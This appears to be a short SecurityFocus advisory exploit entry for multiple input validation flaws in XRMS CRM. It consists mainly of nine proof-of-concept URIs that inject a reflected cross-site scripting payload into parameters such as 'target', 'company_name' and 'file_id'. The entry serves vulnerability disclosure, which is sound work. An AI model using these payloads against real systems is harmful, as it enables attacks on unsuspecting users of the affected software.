XRMS CRM Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.

The following example URIs are available to demonstrate the cross-site scripting issues:

http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus